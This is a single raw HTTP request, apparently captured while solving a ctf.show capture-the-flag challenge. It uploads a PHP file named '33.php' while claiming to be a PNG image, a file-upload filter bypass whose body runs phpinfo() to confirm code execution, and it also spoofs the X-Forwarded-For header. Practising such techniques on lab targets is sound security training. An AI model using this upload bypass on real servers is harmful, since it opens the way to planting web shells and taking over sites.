POST /upload.php HTTP/1.1
Host: a38c6a62-dfa4-421a-8a36-6f365845f306.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://a38c6a62-dfa4-421a-8a36-6f365845f306.challenge.ctf.show/
Content-Length: 202
Content-Type: multipart/form-data; boundary=---------------------------92812834014900
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive

-----------------------------92812834014900
Content-Disposition: form-data; name="file"; filename="33.php"
Content-Type: image/png

<?php phpinfo();?>
-----------------------------92812834014900--
